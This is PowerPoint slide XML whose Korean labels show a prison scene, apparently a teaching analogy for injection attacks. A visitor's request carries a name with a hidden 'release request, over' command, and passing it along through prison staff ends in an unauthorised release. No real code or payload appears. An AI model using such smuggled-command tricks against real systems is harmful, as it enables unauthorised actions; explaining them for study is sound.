                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C12FD55D-CE08-44EF-9306-0B74936894C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4" t="48557" r="66513" b="18054"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7687057" y="4710113"/>
            <a:ext cx="2206751"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6" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0021EB-70AC-4C11-81DE-8C81281EF0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289422" y="3579347"/>
            <a:ext cx="5572125" cy="962025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300598268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교도소 수감자는 경비원이 시계를 유지합니다. 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 54579253.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E12AD4-82CF-4047-A4CB-E371D4022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74" y="1921912"/>
            <a:ext cx="6607742" cy="33752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접견 - 스톡일러스트 [10562919] - PIXTA">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7583B7-1EDD-44C9-8244-CEDA1C39F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50" t="5673" r="223" b="6985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8262760" y="4207858"/>
            <a:ext cx="3159068" cy="228501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1B0EA4A-59E3-411E-9858-E93CC28A8634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9756476" y="3650013"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="말풍선: 모서리가 둥근 사각형 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1663F95F-E367-412E-B7CA-6A6EF59878C8}"/>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면회 부탁</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="직사각형 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E7F4B5-0FEC-4315-8306-50F0282EA715}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="그룹 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE1977C-CF8B-4C3B-92F2-6A97C01E7ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7379311" y="3032490"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="말풍선: 모서리가 둥근 사각형 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D15A9D-7AA6-40BC-BB14-310EC6898B2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면회 요청</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="직사각형 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CED38CDB-E7E9-4B88-9C23-8A05E5C666F7}"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="화살표: 오른쪽으로 구부러짐 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112518A9-0168-4F34-BD78-C39A85A170AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6037669">
            <a:off x="7671368" y="3151617"/>
            <a:ext cx="437934" cy="19983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경찰 아이콘 이미지 | 프리미엄 벡터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E8B3D70-AE4D-4984-8589-2BAEFD2B99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3848" y="2172792"/>
            <a:ext cx="1578521" cy="157852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그룹 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE09EB4-A7D4-4C09-AC7F-8EA016A64F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9783436" y="1299954"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="말풍선: 모서리가 둥근 사각형 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F934446E-756D-4FC8-AA40-02BD282BB509}"/>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석방 최종결정</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="직사각형 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C346FB3-97B1-4167-AE73-574015B30C88}"/>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22" name="화살표: 오른쪽으로 구부러짐 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D054B9-7583-4392-9B29-58AAB6A59B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6037669">
            <a:off x="9897828" y="4028935"/>
            <a:ext cx="257867" cy="12738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3" name="화살표: 오른쪽으로 구부러짐 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14E6ED7E-1CC2-4BC4-9446-690E9FE44553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3052499">
            <a:off x="9665374" y="2969827"/>
            <a:ext cx="319487" cy="1702324"/>
          </a:xfrm>
          <a:prstGeom prst="curved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화살표: 오른쪽으로 구부러짐 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAF75C25-A213-487A-95E8-B6F0FD15F4DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17093459" flipV="1">
            <a:off x="7640264" y="3734394"/>
            <a:ext cx="394529" cy="2077530"/>
          </a:xfrm>
          <a:prstGeom prst="curved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5" name="그룹 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3D8A38-7412-428F-846A-D86FD0F423B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6900812" y="4910066"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="말풍선: 모서리가 둥근 사각형 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9EFBE42-98E7-4680-8514-B16AC5CBA14B}"/>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석방 요청</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="직사각형 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38935BEF-72D9-40E0-A817-FFDE779EC148}"/>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DCCB874-027F-45B4-AC26-7BA834F55C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4229194" y="2930685"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="말풍선: 모서리가 둥근 사각형 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E75B6A-D86D-4258-A3C5-994C0FF5C283}"/>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 면회장으로 연행</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="직사각형 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{500CC543-C48E-43E5-BB2C-99A819F21868}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="그룹 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8F01D1-0F27-41E4-9027-21EBFC4FA834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4319182" y="5230742"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="말풍선: 모서리가 둥근 사각형 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D3C129-355F-4E99-8896-7AE0793895F8}"/>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홍길동씨 석방 실행</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="직사각형 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F2CBE0-DB7B-4097-BDB9-DFE495CCB4CB}"/>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13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B82E2D6-ECF2-4702-9E10-F31B2A9DDAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284206" y="5137590"/>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홍길동</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="직사각형 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B2F464-9A5C-46EC-8C78-659DA0188619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9492148" y="2449138"/>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교정관</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="직사각형 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D5F4ADC-6618-4F00-BAA7-43670484880B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8658781" y="5992530"/>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교감</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="직사각형 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3BDA47-164A-41EF-97FA-176EB40166E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10325970" y="6181699"/>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외부인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="직사각형 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E33AD0-1D1B-4019-AE88-A1693C1AFD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746950" y="4287967"/>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교도관</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3742865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P spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>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교도소 수감자는 경비원이 시계를 유지합니다. 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 54579253.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E12AD4-82CF-4047-A4CB-E371D4022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74" y="1921912"/>
            <a:ext cx="6607742" cy="33752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접견 - 스톡일러스트 [10562919] - PIXTA">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7583B7-1EDD-44C9-8244-CEDA1C39F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50" t="5673" r="223" b="6985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8262760" y="4207858"/>
            <a:ext cx="3159068" cy="228501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1B0EA4A-59E3-411E-9858-E93CC28A8634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9756476" y="3650013"/>
            <a:ext cx="2289146" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="말풍선: 모서리가 둥근 사각형 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1663F95F-E367-412E-B7CA-6A6EF59878C8}"/>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홍길동씨 석방 요청 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 면회 부탁</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="직사각형 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E7F4B5-0FEC-4315-8306-50F0282EA715}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="그룹 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE1977C-CF8B-4C3B-92F2-6A97C01E7ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7350180" y="3016114"/>
            <a:ext cx="2240868" cy="793019"/>
            <a:chOff x="8796669" y="3123526"/>
            <a:chExt cx="2240868" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="말풍선: 모서리가 둥근 사각형 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D15A9D-7AA6-40BC-BB14-310EC6898B25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8796669" y="3366287"/>
              <a:ext cx="2240868"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홍길동씨 석방 요청 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>씨</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 면회 요청</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>오버</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="직사각형 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CED38CDB-E7E9-4B88-9C23-8A05E5C666F7}"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="화살표: 오른쪽으로 구부러짐 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112518A9-0168-4F34-BD78-C39A85A170AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6037669">
            <a:off x="7671368" y="3151617"/>
            <a:ext cx="437934" cy="19983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경찰 아이콘 이미지 | 프리미엄 벡터">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E8B3D70-AE4D-4984-8589-2BAEFD2B99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3848" y="2172792"/>
            <a:ext cx="1578521" cy="1578521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="화살표: 오른쪽으로 구부러짐 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D054B9-7583-4392-9B29-58AAB6A59B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6037669">
            <a:off x="9897828" y="4028935"/>
            <a:ext cx="257867" cy="12738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4" name="그룹 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8F01D1-0F27-41E4-9027-21EBFC4FA834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4342482" y="5040298"/>
            <a:ext cx="2176757" cy="793019"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="말풍선: 모서리가 둥근 사각형 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D3C129-355F-4E99-8896-7AE0793895F8}"/>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홍길동씨 석방 실행</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="직사각형 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8F2CBE0-DB7B-4097-BDB9-DFE495CCB4CB}"/>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37" name="직사각형 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A358779C-A9D3-4A72-A7A3-7D04939DDA08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5284206" y="5137590"/>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홍길동</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="직사각형 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58CD8B42-414E-4F5B-95CF-54964639A207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9492148" y="2449138"/>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교정관</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="직사각형 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
